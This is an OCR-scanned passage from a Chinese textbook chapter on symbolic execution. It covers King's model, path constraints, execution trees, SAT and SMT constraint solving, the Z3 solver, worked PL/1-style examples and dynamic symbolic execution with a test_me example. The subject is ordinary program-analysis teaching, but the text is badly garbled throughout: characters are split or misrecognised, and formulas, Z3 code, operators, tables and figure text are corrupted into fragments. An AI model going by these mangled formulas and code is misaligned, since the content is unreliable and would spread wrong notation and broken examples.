在 King 吕 设计 的 理想 模型 中 ,程序 使 用 的 每 个 符号 变量 都 应 该 是 一 个 有 符号 整数 。 

2. 程序 语句 

1) 变量 操作 语句 

(1) 数学 运算 符 。 

程序 具体 执行 时 ,数学 运算 操作 可 以 描述 成 操作 符 、 圆 括号 和 整数 变量 构成 的 多 项 表 
达 式 ,例如 ,a=1 十 (2* 4)。 符 号 执行 模式 下 同样 可 进行 类 似 的 描述 ,只 需要 将 表达 式 中 
的 整数 蔡 换 成 符号 值 集合 即 可 ,例如 ,a 二 al 十 (a2 x a3)。 可 以 看 到 ,符号 值 的 引入 并 没有 
修改 数学 运算 符 的 操作 语义 ,只 是 运算 结果 由 整数 多 项 式 变 成 了 符号 多 项 式 。 

(2) 数据 读 写 操作 。 

以 读 操 作 read(addr) 为 例 , 当 addr 中 的 值 为 具体 值 时 ,read(Caddr) 返 回 具体 值 ; 如 果 
addr 中 的 值 为 符号 值 , 则 返回 符号 值 。 所 以 符号 执行 同样 没有 影响 读 写 操作 的 语义 。 

2) 无 条 件 跳 转 语句 

goto 语句 也 称 为 无 条 件 跳 转 语句 ,其 一 般 书 写 格式 为 


goto 语句 标号 
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其 中 语句 标号 是 按 程 序 标识 符 规范 书写 的 符号 , 放 在 某 一 语句 行 的 前 面 ,标号 后 需要 添加 
冒号 (:) ,语句 标 号 起 标识 语句 的 作用 ,与 goto 语句 配合 使 用 。 示 例如 下 ,其 中 loop 就 是 
语句 标号 : 


goto loop: 


loop: while (x« 7); 


符号 执行 模式 中 goto 语句 与 具体 执行 中 的 语义 是 完全 一 致 的 。 
3) 声明 语句 及 条 件 跳 转 语句 
具体 执行 时 ,无 论 是 条 件 跳 转 语句 还 是 声明 语句 ,语句 内 表达 式 的 取 值 都 是 具体 值 。 
例如 ifCa—00 ,表达 式 a<0 的 真 值 在 语句 执行 完成 后 就 可 以 计算 出 来 ,并 根据 真 值 决定 
条 件 分 支 的 跳 转 ,因为 a 的 取 值 是 已 知 的 。 符 号 执行 时 ,if 语句 的 语义 没有 变化 ,同样 会 
根据 ao 的 计算 结果 进行 跳 转 , 但 此 时 a 为 符号 变量 ,无 法 计算 出 a=0 的 真 值 ,该 如 何 
决定 条 件 分 支 的 走向 呢 ? 这 就 是 符号 执行 技术 对 程序 执行 语义 的 最 大 改变 ,也 是 符号 执 
行 和 具体 执行 的 关键 区 别 : 符号 变量 的 引入 使 得 程序 执行 到 路 径 分 支 时 无 法 确定 程序 的 
走向 。 
3. 程序 执行 状态 
具体 执行 时 ,程序 状态 中 通常 包括 程序 变量 的 具体 值 、 程 序 指令 计数 等 描述 信息 ,使 
用 这 些 信息 就 可 以 描述 程序 执行 的 控制 流向 。 因 为 符号 变量 的 引入 导致 分 支 走 向 不 确 
定 , 仅 凭 原 有 的 信息 已 经 无 法 完整 描述 符号 执行 的 状态 ,King 为 程序 状态 新 添加 了 一 个 
变量 : 路 径 约束 条 件 ,下 面 都 用 pc(path constraint) 来 表示 。 
简单 地 说 ,pc 就 是 符号 执行 过 程 中 对 路 径 上 条 件 分 支 走 向 的 选择 情况 ,根据 状态 中 
的 pc 变量 就 可 以 确定 一 次 符号 执行 的 完整 路 径 。 如 前 文 所 述 , 符 号 执行 过 程 中 ,在 每 个 
证 条 件 语句 处 并 没有 实际 值 决定 程序 执行 哪 条 分 支 ,这 就 需要 符号 执行 引擎 主动 选择 执 
行 分 支 并 记录 整个 执行 过 程 ,pc 就 辅助 完成 了 这 项 工作 。 举 例 来 说 ,假设 符号 执行 过 程 
中 经 过 3 个 与 符号 变量 相关 的 if 条 件 语句 if 、ifs ifa ,每 个 条 件 语句 处 的 表达 式 如 下 
所 示 : 
ifi: a 20 
ifz: a +2* a: > 0 
if: as 20 
假设 引擎 在 3 个 庄 条 件 分 支 处 分 别 选择 的 是 ifi : truesifz: true.if; : false, W pc 表示 
为 
pc 一 (ai 过 0Aa 十 2*asz 志 0A 7(a > 0)) 
如 上 面 所 示 ,pc 是 一 个 bool 表达 式 ,表达 式 由 符号 执行 路 径 上 涉及 的 计 条 件 语句 中 
的 表达 式 及 表达 式 的 真 值 选 择 拼接 而 成 。 假 设 if, 处 的 表达 式 为 R 宇 0,R 是 一 个 与 符号 
变量 相关 的 多 项 表达 式 ,把 RZ-0 称 为 q, 则 程序 执行 到 if, 处 时 pc 可 能 会 表现 为 下 面 两 
种 形式 之 一 : 
(OD pc 包含 q。 
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(2) pc fii ^q. 

如 果 符 号 执行 引擎 选择 进入 then 分 支 , 则 R0 的 真 值 为 true, pc 表现 为 (1) 的 形 
式 ; 如 果 选 择 else 分 支 , 则 R 三 0 的 真 值 为 false. pc 表现 为 (2) 的 形式 。 需 要 注意 的 是 ,pc 
的 初始 值 为 true。 

在 程序 逻辑 中 ,程序 设计 人 员 当 然 希 望 一 个 让 分支 的 then 和 else 分 支 都 能 够 被 执行 
到 ,所 以 当 执 行 到 if 条 件 语句 处 时 ,符号 执行 需要 创建 两 个 “并 行 ”的 执行 过 程 : 一 个 进入 
让 语句 的 then 分 支 ,生成 then 分 支 对 应 的 pc; 男 一 个 进入 else 分支, 同样 生成 对 应 的 pc。 
两 个 符号 执行 过 程 在 寺 分 支 之 后 相互 独立 ,拥有 各 自 的 执行 状态 ,介绍 到 这 里 读者 可 以 
明白 ,符号 执行 过 程 中 产生 的 分 支 只 和 条 件 语句 相关 ,与 其 他 的 程序 执行 状态 无 关 , 如 
果 只 是 执行 普通 的 程序 声明 语句 或 者 运算 指令 引擎 ,不 会 产生 分 支 。 

当选 择 then 分 支 的 时 候 ,假设 输入 变量 是 满足 q 的 ,这 个 过 程 可 以 用 表达 描述 为 pc 
三 pc 人 Aq, 类 似 的 ,当选 择 else 分 支 时 可 以 描述 为 pc 二 pc 人 7 qpe 之 所 以 被 称 为 条 件 路 径 
就 是 因为 根据 其 内 容 就 可 以 确定 一 条 唯一 的 程序 执行 路 径 。 每 个 和 符号 变量 相关 的 if 
条 件 语句 都 会 为 pc 贡献 一 个 决定 程序 执行 走向 的 表达 式 。pce 的 真 值 恒 为 true, 当 pc 的 
表达 式 为 pe=pc A q 时 ,要 确定 pc 对 应 路 径 的 程序 输入 参数 ,只 需要 使 用 约束 求解 器 对 
pc 进行 求解 。 
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执行 树 是 用 来 描述 程序 执行 路 径 的 树 形 结构 。 执 行 树 中 的 一 个 节点 对 应 程序 中 的 一 
条 语句 ,程序 语句 之 间 的 执行 顺序 或 跳 转 关系 对 应 执行 树 中 节点 间 的 边 。 对 于 每 个 让 语 
名 会 有 两 条 边 与 其 相连 , 左 子 树 对 应 的 是 if 语句 的 true(then) 分 支 , 右 子 树 对 应 if 语句 的 
false(else) 分 支 。 执 行 树 中 还 可 以 包含 指令 计数 、pc( 路 径 约 束 条 件 )、 变 量 值 等 程序 执行 
状态 信息 。 一 个 函数 与 其 执行 树 的 对 应 关系 如 图 5-1 所 示 。 


int y; Loc: 5 
int 2; xx 
y Y 


1 

2 

3... 

4 int foo(int x) 
5 if (x > 0) ( 
6 
7 
8 


Su 
SN 
c 


yayta Loc:6 


) else ( xX x X 
y-"yY-x yY Y 
9 ) £Z zZ 
10 if (x> 0) ( PC: X20 PC: X 和 0 
11 az-z-y | | 
12 ) else { Loc:10 Loc:10 
13 z=z+y x:X x:X 
Mo) DY+X y: Y-X 
15 ) zZ £Z 
PC: X>0 PC: X«0 
Loc:ll Loc:13 Loc:ll Loc:13 
x:X xXx xXx xX 
y: Y+X y: Y4X y: Y-X y: Y-X 
z: Z-(Y+X) z: Z+(Y+X) z:Z-(Y-X) z: £«Y-X) 


PC: (X70) ^ (X70) PC: (X0) ^ (X€0) PC: (X€0) ^ (X70) PC: (X€0) ^ (X«0) 
图 5-1 符号 执行 树 实例 
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执行 树 描述 了 执行 路 径 在 各 程序 指令 处 的 状态 , 且 具 有 如 下 特性 : 

。 对 于 执行 树 中 的 每 个 叶 节 点 ,都 对 应 一 组 具体 输入 值 能 够 让 程序 执行 到 当前 状 
态 , 即 当 被 测试 程序 在 设计 和 编码 都 没有 出 现 错误 的 情况 下 ,每 个 叶 节 点 上 对 应 
的 pc 表达 式 都 应 是 恒 真 的 ,pc 中 的 所 有 符号 变量 一 定 可 以 求 得 一 组 解 使 pc 为 
真 ,这 组 解 就 是 指导 程序 执行 到 该 叶 节点 对 应 语句 处 的 实际 输入 值 。 如 果 在 测试 
中 出 现 某 个 叶 节点 上 pe 表达 式 无 解 的 情况 ,说明 该 路 径 是 存在 逻辑 问题 的 ,该 叶 
节点 对 应 的 路 径 不 可 达 。 

执行 树 中 任何 两 个 叶 节点 上 的 执行 状态 都 是 有 区 别 的 ,因为 任意 两 个 叶 节 点 对 应 
的 执行 路 径 都 是 从 root 节点 起 始 的 ,并 在 执行 树 的 某 个 节点 处 分 支 成 为 两 个 不 
同 的 路 径 , 一 条 路 径 选 择 了 该 节点 的 true(then) 分 支 , 另 一 个 进入 了 false(else) 分 
支 ,所 以 两 个 路 径 的 最 终 状态 必然 不 相同 。 在 图 5-2 的 示例 代码 中 ,虽然 程序 中 
有 循环 ,但 当初 始 值 不 同时 ,程序 的 执行 路 径 完全 不 相同 ,不 会 因为 循环 而 产生 重 
合 的 情况 。 执 行路 径 的 唯一 性 使 得 测试 过 程 中 不 会 产生 元 余 的 用 例 。 假 设 图 5-2 
中 的 输入 用 例 为 a ,圆圈 中 数字 代表 对 应 的 代码 行 数 。 


1 TWOLOOPS:PROCEDURE(N); 

2 DO J-1 TON; 

3 (body of statements)END; 
4 DO K-1 TO N; 

5 (body of statements)END; 
6 END; 





图 5-2 循环 程序 执行 树 实例 
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通过 5. 1.4 节 的 介绍 可 以 知道 ,每 个 叶 节点 对 应 的 执行 路 径 可 以 由 一 组 具体 输入 指 
导 程 序 运 行 得 到 ,而 这 组 具体 值 正 是 借助 约束 求解 器 对 pc 求解 得 到 的 。 符 号 执行 过 程 
中 ,执行 树 中 每 个 叶 节点 对 应 的 pc 会 被 输入 约束 求解 器 进行 求解 ,如 果 pc 表达 式 有 解 ， 
则 求解 器 会 输出 满足 pc 的 一 组 符号 变量 的 具体 值 , 如 果 无 解 则 说 明 该 叶 节点 对 应 的 执行 
路 径 是 不 可 达 的 。 

1. 约束 求解 问题 

关于 约束 满足 问题 求解 (CSP) 的 研究 最 早 是 由 Montanari 在 1974 年 发 起 的 3 。 最 
初 它 被 用 于 描述 图 像 处 理 中 的 一 些 问题 .随后 , 便 作为 一 种 通用 模型 被 广泛 用 于 各 类 理论 
和 实际 问题 的 研究 中 9 。 
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约束 求解 问题 可 以 形式 化 表示 为 一 个 三 元 组 <V,D,C>, 其 中 的 3 个 要 素 分 别 为 : 
变量 V、 变 量 的 论 域 D MARREC. TEV 是 变量 的 有 限 集合 ,表示 为 V= (usv, 
v, ;变量 的 论 域 D 是 变量 可 能 取 值 的 有 限 集合 ,变量 v, 只 能 在 它 的 值 域 即 论 域 D; 中 取 
值 ;约束 C 是 一 个 有 限 约 束 集合 , 某 个 约束 关系 C; 包含 V 中 一 个 或 多 个 变量 , 若 C; 包含 
k 个 变量 , 则 称 C; 为 在 这 k 个 变量 集合 上 的 k ICARO, 

约 东 求解 就 是 找到 约束 问题 的 一 个 解 ,该 解 对 变量 集合 中 所 有 变量 都 赋 一 个 取 自 其 
论 域 的 值 ,并 且 这 些 变量 的 取 值 满足 该 问题 所 有 的 约束 条 件 。 对 于 约束 问题 P — (V.D. 
CO) ,车 PP 至少 存在 一 个 解 , 则 称 P 是 可 满足 的 ,否则 , 称 P 为 不 可 满足 的 。 在 符号 执行 技 
术 中 ,约束 求解 器 被 用 来 求解 pc 的 可 满足 问题 59 。 现 在 主流 的 约束 求解 器 主要 基于 两 
种 理论 模型 : SAT 和 SMT, 

D SAT [n] gis 

SAT 问题 CThe Satisfiability problem, 可 满足 性 问题 ) ,是 指 求 解 由 布尔 变量 集合 所 
构成 的 布尔 函数 ,是 否 存 在 变量 的 一 种 分 布 使 得 该 函数 的 取 值 为 1。 举例 来 说 ,假设 布尔 
函数 为 — (a V ABV NAON 70) ,其 中 By 是 布尔 变量 , 求 使 得 更 值 为 1 时 的 
a By 的 取 值 分 布 。 在 此 例 中 , 当 (a, B. 7) 的 取 值 分 布 为 (1,0,1) 时 可 以 满足 因此 o — 1. 
因此 ,该 问题 是 布尔 可 满足 的 (satisfiable)。 当 不 存在 任何 一 种 分 布 满 足 c 1 时 , 称 该 问 
题 是 布尔 不 可 满足 的 。SAT 问题 是 计算 机 科学 领域 中 非常 重要 的 一 项 研究 ,在 人 工 智能 
(Artificial Intelligence, AD ,软件 设计 形式 化 验证 以 及 硬件 设计 方面 ,如 集成 电路 验证 、 
组 合 电 路 等 价 性 验证 等 ,都 有 着 重要 的 应 用 。 

但 是 SAT 求解 只 能 解决 命题 逻辑 公式 问题 ,使 得 许多 实际 应 用 问题 无 法 直接 转换 为 
SAT 问题 来 求解 。 并 且 在 SAT 问题 中 必须 使 用 布尔 变量 来 表示 ,要 把 实际 应 用 中 对 应 
的 迎 辑 关系 转换 为 布尔 函数 ,转换 开销 很 大 ,转换 后 的 布尔 函数 结构 也 非常 复杂 ,导致 最 
后 的 求解 过 程 可 能 无 法 完成 。SAT 求解 的 种 种 不 足 限 制 了 其 应 用 范围 ,因此 后 续 的 研究 
提出 了 SMT 理论 。 

2) SMT In] fie 

SMT (Satisfiability Modulo Theories. ,可 满足 性 模 理 论 ) ,是 在 可 满足 性 问题 (SAT) 
的 基础 上 扩展 而 来 的 , 它 将 SAT 求解 从 只 能 解决 命题 逮 辑 公式 扩展 为 可 以 解决 一 阶 逮 
辑 所 表达 的 公式 。SMT 包含 有 多 种 理论 ,如 定 长 位 向 量 理论 (fixed-size bit-vector)、 数 组 
Carray)、 未 定义 函数 Cuninterpreted function) 等 ,通过 组 合 使 用 这 些 基本 理论 ,SMT 在 硬 
件 验证 ,定理 证 明 以 及 本 书 提 到 的 约束 求解 和 自动 化 测试 用 例 生 成 等 领域 都 得 到 了 广泛 
的 应 用 。 

近年 来 ,对 SMT 的 研究 和 应 用 得 到 了 很 大 的 发 展 , 许 多 高 校 和 科技 企业 开发 出 越 来 
越 高 效 的 SM T 求解 器 ,如 麻 省 理工 学 院 的 STP 求解 器 、 林 茨 大 学 的 Boolector 求解 器 以 
及 微软 研究 院 的 Z3 求解 器 。 表 5-1 给 出 了 当前 主要 的 SMT 求解 器 及 其 支持 的 SMT 求 
解 理论 。 


Me 


表 5-1 SMT 求解 器 US 















































SMT 求 解 器 支持 的 操作 系统 支持 的 求解 理论 

ABsolver Linux 线性 计算 、 非 线性 计算 

Beaver Linux/Windows 位 向 量 

Boolector Linux 位 向 量 .数组 

cva Linux/Mac OS 线性 计算 .数组 .位 向 量 、 有 理 数 与 整数 .元 组 ,数组 

MathSAT — | Linux 空 理论 线性 计算 、 位 向 量 、 数 组 

MiniSmt Linux 非 线性 计算 

OpenSMT Linux/Mac OS/Windows | 空 理论 .线性 计算 、 位 向 量 

SMT-RAT Linux/Mac OS 线性 计算 、 非 线性 计算 

m" Tar EE UNEJU 

UCLID mem 空 理论 .线性 计算 .位 向 量 

Yices Linux/Windows/ Mac OS 

z3 psx Windows/Mae OS | 空 理论 ,线性 计算 , 非 线性 计算 \ 位 向 量 ,数组 .量化 
2.Z3 求解 器 


在 大 量 SMT 求解 器 当中 ,最 出 众 的 莫 过 于 由 微软 研究 院 Leonardo de Moura 主持 设 
计 的 Za 求解 器 ,其 被 设计 作为 其 他 应 用 程序 的 底层 工具 ,在 大 量 和 定理 证 明 、 程 序 测试 
的 项 目 中 都 得 到 应 用 ,包括 Spec # Boogie, Pex, Yogi, Vigilante, SLAM,SAGE,VS3 等 。 
Z3 致力 于 解决 软件 验证 和 软件 分 析 中 的 问题 , 它 为 大 量 的 理论 提供 了 支持 ,使 用 全 新 的 
算法 进行 量词 实例 化 和 理论 合并 ,在 2007 —2011 年 的 各 项 大 赛 中 取得 了 优异 成 绩 。 相 比 
于 Yices, STP 等 求解 器 ,Z3 不 仅 性 能 卓越 ,其 提供 的 API 也 更 加 简洁 ,所 以 成 为 大 多 数 
符号 执行 工具 的 首选 。 

Z3 是 用 C++ 实现 的 ,其 可 以 使 用 多 种 编程 语言 来 描述 所 要 求解 的 问题 ,如 C 语言 
IÈ Python 语言 格式 .SMT-LIB 格式 、NET 语言 格式 .Simplify 格式 等 。Z3 的 结构 如 
图 5-3 所 示 。 

* 化 简 模 块 (Simplifier) 。Z3 求解 器 首先 会 对 表达 式 进行 化 简 处 理 ,这 一 步 又 不 要 

求 完善 ,但 要 求 高 效 。 化 简 模 块 使 用 的 是 标准 代数 化 简 原则 ,如 线性 变换 、 变 量 数 
值 化 等 ,如 pAtrue rp。 同时 也 会 对 条 件 表达 式 做 一 些 有 限度 的 文本 简化 ,如 将 
表达 式 中 的 符号 用 数值 来 代替 : z 一 4Ad(Cz)mz 一 4 人 da(4) 。 

。 编译 模块 (Compiler) 。 将 经 过 初步 简化 处 理 的 表达 式 转换 为 特定 的 语法 树 和 数 

据 结构 。 

。 核心 模块 (Congruence Closure Core) 。 调 用 理论 求解 器 (Theory Solver) 和 SAT 

求解 器 处 理 经 过 编译 的 表达 式 ,并 实现 了 两 个 求解 模块 的 数据 共享 。 

* 理论 求解 模块 (Theory Solver) 。 其 中 包括 了 SMT 求解 器 常用 的 基本 理论 ,线性 
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r 一 本 ES 3 
| 求解 问题 描述 语言 [ocam | | 
| | 
| | 
| SMT-LIB Simplify Native text | C .NET | 
ze E | 
T 理论 求解 器 
me. i£ 
化 简 (Simplifier) (Theory Solver) 
线性 算术 
1 Linear arithmetic 
编译 (Compiler) TW 
Bit-vector 
! 
5 数组 
等 式 任务 Array 
核心 模块 Equalities assignment 
Congruence closure core 原子 UH 
|a New atom Tuple 
| 文本 任务 
Literal assignment bod 
SAT 求解 器 (solver) e—a E-matching 引擎 (engine) 
clause 














图 5-3 Z3 求解 器 的 结构 


算术 模块 是 基于 Yices 中 使 用 的 算法 实现 的 ,其 他 的 如 数组 模块 ,位 向 量 模块 等 
也 都 是 基于 经 典 算法 实现 的 。 

* SAT 求解 模块 : 该 模块 使 用 的 是 经 典 SAT 求解 技术 。 

这 里 以 Z3 提供 的 Python 接口 为 例 说 明 其 使 用 方法 。 


>>>a=Int('a') 

»»»solve(a»0, a«2) 

[a-1] 

上 面 代码 片段 中 的 Int Cab 函数 创建 了 一 个 整数 变量 ,并 将 该 变量 命名 为 a。solve PR 
数 对 括号 中 的 约束 条 件 集合 进行 求解 。Z3 提供 的 Python 接口 允许 用 户 使 用 操作 符 一 、 
二 三 三 来 描述 表达 式 间 的 关系 。 默 认 情 况 下 ,solve 函数 中 的 约束 条 件 是 逻辑 与 的 关系 。 
Z3 根据 变量 类 型 和 约束 条 件 集合 对 变量 进行 求解 ,上 例 中 求解 得 到 a— 1. 


5.16 符号 执行 实例 


前 面 已 经 介绍 了 符号 执行 技术 的 基本 原理 和 方法 ,下 面 用 实例 说 明 其 实际 执行 过 程 ， 
首先 通过 一 个 简单 的 实例 说 明 符号 执行 与 具体 执行 的 区 别 。 

1 SUM: PROCEDURE (A, B, C); 

2 XA B; 

3 Y-—BtC; 


E 软件 安全 分 析 与 应 用 


4 Z*-XtY-B; 
5 RETUREN (2); 
6 END; 


上 面 是 用 类 PL/1 语言 的 语法 编写 的 一 个 计算 三 数 之 和 的 代码 ,代码 中 对 每 条 指令 
进行 了 编号 , 表 5-2 中 的 编号 都 是 与 指令 编号 相对 应 的 。 如 果 函 数 的 初始 输入 为 1,3,5， 
则 程序 执行 过 程 中 各 变量 的 变化 如 表 5-2 所 示 ,程序 输出 为 9。 

表 5-2 SUM 函数 在 程序 执行 过 程 中 各 变量 的 变化 



































指令 行 数 X Y Z A B c 
1 ? 1 1 1 3 5 
2 4 ? ji 1 3 5 
3 4 8 1 1 3 5 
4 4 8 9 1 3 5 
5 (返回 9) 





现在 用 3 个 符号 来 表示 ABC 3 个 整数 输入 ,符号 执行 过 程 中 的 变量 变化 如 下 ( 表 5-3): 
表 5-3 SUM 函数 在 符号 执行 过 程 中 各 变量 的 变化 



































指令 行 数 X Y rÀ A B Ç pe 
1 ? ? ? a a2 az true 
2 a +a: 一 一 一 一 一 一 
3 - a; +a; 一 一 一 一 一 
4 一 一 a; +a: +a; - 一 一 一 
5 (返回 w +a: +a; ) 





(1) 第 一 条 语句 是 函数 的 入 口 ,符号 执行 引擎 将 3 个 输入 参数 符号 化 为 w 、as .as, 同 
时 将 pc 初始 化 为 true。 

(2) 第 二 条 语句 为 X==A 十 B, 使 用 符号 进行 数学 运算 ,并 将 符号 表达 式 赋予 变量 X, 
X=a ta, 
G) 第 三 条 语句 为 Y=B+C, 使 用 符号 进行 数学 运算 ,并 将 符号 表达 式 赋 予 变量 Y, 
YY 一 al 十 aa 。 

(4) 第 四 条 语句 为 Z==X 十 Y 一 B, 将 各 变量 的 符号 值 带 入 运算 得 Z—a 十 十 os 。 

O) 函数 将 符号 表达 式 a ta 十 os 作为 返回 值 。 

上 面 的 简单 例子 已 经 说 明了 符号 执行 与 实际 执行 中 程序 变量 的 区 别 。 下 面 再 用 一 个 
实例 说 明 符 号 执行 的 完整 流程 及 可 能 遇 到 的 问题 。 





1 POWER: PROCEDURE (X, Y); 
2 ncc d 
3 oec dg 
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4 LAB: IFY>J THEN 
5 DO;Z2-*-2 * X; 
6 ga ls 
7 GO TO LAB; END; 
8 RETURN (Z) ; 
9 END; 


对 上 面 示例 中 POWER 函数 的 符号 执行 过 程 说 明 如 下 。 在 第 4 行 代 码 中 遇 到 IF 条 
件 语句 ,约束 条 件 YSJ 转换 成 符号 表达 式 就 是 a; 宇 1, 符 号 执行 引擎 会 分 别 探索 分 支 的 
两 条 路 径 ,选择 true 分 支 的 会 在 路 径 条 件 pc 中 添加 a 1. 4H 6 ,选择 false 分 支 的 会 在 
pc 中 添加 (as 三 1)。 

选择 false 分 支 的 探索 过 程 会 在 第 8 行 代 码 处 结束 ,如 果 需 要 构造 执行 false 分 支 的 
case, 只 需要 对 pc 进行 求解 即 可 ,例如 一 组 解 为 X==0,Y 二 0。 选 择 true 分 支 的 探索 会 进 
入 循环 结构 ,在 执行 完 第 5 一 7 行 代码 后 ,程序 控制 流 又 回 到 第 4 行 的 分 支 处 ,和 上 面 的 操 
作 相 同 ,符号 执行 引擎 再 次 添加 两 条 探索 路 径 。 

上 面 的 例子 在 符号 执行 过 程 中 各 变量 的 变化 如 表 5-4 所 示 。 

程序 中 有 循环 的 情况 很 普遍 ,但 对 于 符号 执行 来 说 ,循环 语句 就 不 太 友善 了 。 对 于 本 
例 , 因 为 条 件 语句 中 的 符号 变量 a 并 不 受 其 他 约束 条 件 的 控制 ,所 以 IF 条 件 语句 的 true 
分 支 可 以 无 限 探索 下 去 , 即 符号 执行 引擎 是 无 法 正常 终止 的 。 循 环 问题 是 符号 执行 技术 
中 的 重要 问题 ,本 书 会 在 后 面 的 章节 中 进行 详细 介绍 。 

表 5-4 POWER 函数 符号 执行 过 程 中 各 变量 的 变化 





























指令 行 数 J Xx Y Zz pe 
1 ? a [3 T true 
2 一 - 一 1 一 
3 1 - - - - 
执行 过 程 : 


CD 处 理 判 断 语句 YSJ HAARR >l. 

Q 生成 两 个 分 支 的 路 径 约束 条 件 : 

* true2a; Z1 

* true2 2 (a; Z1) 

© 两 个 路 径 约束 都 可 满足 ,分 别 对 两 个 路 径 进行 探索 。 





分 支 (20D: 




















4 1 a az 1 (al) 
8 探索 完成 (returns 1 when a; <1) 
Xam 
4 1 a az 1 oz 过 1 
5 = 一 = a 一 
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续 表 
指令 行 数 J X Y Z pe 
6 2 一 E i - 
7 æ m - = ES 
执行 过 程 : 
CD 处 理 判 断 语 句 Y2J 得 到 约束 条 件 a2. 
D 生成 两 个 分 支 的 约束 条 件 : 
* a;Z12a Z2 
* ald (a Z2) 
O 两 个 路 径 约束 都 可 满足 ,分 别 对 两 个 路 径 进 行 探索 。 
分 支 " (oz 过 2) ， 
4 2 a a; a al A (oa 过 2) 
8 探索 完成 (returns a, when a; =1) 
分 支 T2. 
4 2 a a " a21Aa22 
(在 该 用 例 中 符号 执行 将 无 限 地 执行 下 去 ) 





5.2 动态 符号 执行 技术 


自 1976 年 符号 执行 技术 被 提出 后 ,研究 人 员 一 直 尝 试 对 其 进行 优化 ,希望 其 能 应 对 
实际 测试 时 的 需求 。 动 态 符 号 执行 技术 就 是 符号 执行 优化 过 程 中 出 现 的 一 种 方法 ,其 主 
要 目标 是 缓解 传统 静态 符号 执行 中 的 误 报 率 高 .效率 低 等 问题 。 本 节 首 先 对 动态 符号 执 
行 技术 的 基本 原理 进行 介绍 ,并 通过 实例 介绍 其 基本 流程 ,然后 以 SAGE 为 例 对 动态 符 
号 执行 中 的 路 径 搜索 算法 及 关键 技术 进行 介绍 ,随后 介绍 符号 执行 面临 的 外 部 函数 调用 
等 问题 以 及 动态 符号 执行 的 发 展 过 程 。 
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传统 的 静态 符号 执行 技术 在 提出 后 的 数 十 年 间 并 没有 得 到 广泛 的 研究 和 使 用 。 基 于 
调用 关系 图 (Call Graph) 和 控制 流 图 (Control Flow Graph) 的 静态 分 析 方案 虽然 准确 率 
高 ,但 效率 极 低 ,同时 因为 忽略 了 程序 运行 时 的 状态 信息 ,很 容易 造成 误 报 ,这 些 原因 影响 
了 符号 执行 技术 的 实用 价值 。 

2005 年 ,Patrice Godefroid 等 人 中 首次 提出 了 动态 符号 执行 概念 ,也 称 为 混合 符号 执 
行 。 动 态 符号 执行 的 基本 思想 是 : 以 具体 的 数值 作为 输入 执行 程序 代码 ,在 程序 实际 执 
行路 径 的 基础 上 ,用 符号 执行 技术 对 路 径 进行 分 析 ,提取 路 径 的 约束 表达 式 , 根 据 路 径 搜 
索 策略 (深度 、 广 度 ) 对 约 东 表达 式 进 行 变形 ,求解 变形 后 的 表达 式 并 生成 新 的 测试 用 例 ， 
不 断 迭 代 上 面 的 过 程 ,直到 完全 遍历 程序 的 所 有 执行 路 径 。 
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动态 符号 执行 技术 的 设计 目标 是 为 了 解决 静态 符号 执行 效率 低 、 系 统 开 销 大 、 误 报 率 
高 的 问题 ,通过 结合 符号 执行 与 实际 执行 的 优势 ,在 保证 测试 精度 的 前 提 下 对 程序 执行 树 
进行 快速 遍历 。 

动态 符号 执行 技术 的 执行 过 程 分 为 以 下 步骤 : 

(1) 使 用 随机 的 具体 值 作为 程序 初始 输入 开始 实际 执行 ,同时 对 实际 执行 路 径 上 的 
代码 进行 符号 执行 (程序 的 初始 输入 作为 符号 ) ,并 从 当前 执行 路 径 的 分 支 条 件 语句 的 谓 
词 中 搜集 所 有 符号 约束 条 件 及 其 对 应 的 真 值 (例如 ,z 一 y 一 一 0: true), 

(2) 根据 收集 到 的 符号 约束 条 件 ,按照 一 定 的 路 径 选 择 策略 (DART 使 用 的 是 深度 优 
先 策略 ) ,对 其 中 的 某 个 约束 条 件 进行 取 反 ,构造 出 一 条 新 的 可 行 的 路 径 约 束 。 

(3) 使 用 约束 求解 器 求解 出 新 约束 集合 对 应 的 具体 输入 。 接 着 使 用 符号 执行 引擎 对 
新 输入 值 进 行 新 一 轮 的 分 析 。 

整个 动态 执行 过 程 可 以 用 如 图 5-4 所 示 的 流程 图 表示 。 
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图 5-4 动态 符号 执行 流程 图 
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下 面 通过 一 个 实例 来 说 明 动 态 符号 执行 各 步骤 的 流程 和 技术 细节 。 

1. 程序 实际 执行 .符号 执行 及 约束 条 件 提取 过 程 

假设 需要 使 用 动态 符号 执行 技术 进行 测试 的 是 函数 test_me。 首 先 部 署 测试 环境 ， 
在 main 函数 中 生成 两 个 随机 整数 tl 和 t2 作为 test_me 函数 的 初始 实例 输入 ,调用 test 
me 函数 后 ,在 程序 实际 执行 的 同时 符号 执行 引擎 也 会 启动 ,首先 对 test_me 函数 的 输入 
参数 x、y 创建 符号 变量 x、y, 如 图 5-5 所 示 , 实 际 执行 路 径 上 的 每 一 条 指令 都 需要 同时 做 
符号 化 执行 处 理 。 

如 图 5-6 所 示 ,变量 z 在 实际 执行 中 经 过 计算 被 赋值 为 72, 在 符号 执行 引擎 中 被 赋值 
为 2* x, 程 序 继 续 执行 。 

如 图 5-7 所 示 ,在 条 件 分 支 寺 (z 一 王 y) 处 ,因为 在 实际 执行 流程 中 ,z 一 72,y 王 99 ,不 满 
足 判断 条 件 ,所 以 程序 选择 else 分 支 , 即 执行 到 黑色 箭头 处 ;同样 ,符号 执行 引擎 也 按照 
该 路 径 执行 ,初始 用 例 对 应 的 执行 路 径 遍历 完成 。 整 个 执行 路 径 上 只 有 一 个 条 件 分 支 语 
名 if(z 二 二 y), 其 中 的 谓词 语句 2——y 在 符号 执行 过 程 中 表示 为 2 * x 一 一 y, 真 值 为 
true。 根 据 符号 执行 引擎 分 析 结 果 生 成 路 径 对 应 的 路 径 约 东 条 件 pc 二 了 (2 * x 一 y 二 0)。 
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main(X{ 
int t1 = randomint(); 
int t2 = randomint(); 
test_me(t1,t2); 

} 

int double(int x) (return 2 * x; } 


void test. me(int x, int y) ( 
intz = double(x); 
if (z==y) { 
if (y == x+10) 


abort(); /* error */ 


实际 执行 


x736,y-99 





符号 执行 。 路 径 约束 条 件 


创建 符号 
变量 x、y 











图 5-5 符号 执行 约束 提取 过 程 1 





main(( 























int t = randomint(; 实际 执行 符号 执行 ”路 径 约束 条 件 
int t2 = randomint(); 
test me(t1,2); 
) 
int double(int x) (return 2 * x; } 
void test. me(int x, int y) ( 创建 符号 
intz = double(x): x=36,y=%, HEX. y 
z=72 z-2*x 
t 
i (y == x+10) 
abort();/* error */ 
) 
1 了 ' 
图 5-6 符号 执行 约束 提取 过 程 2 
main(X{ 


intt1 = randomlnt(); 
int t2 = randomlnt(); 
test_me(t1,t2); 

} 

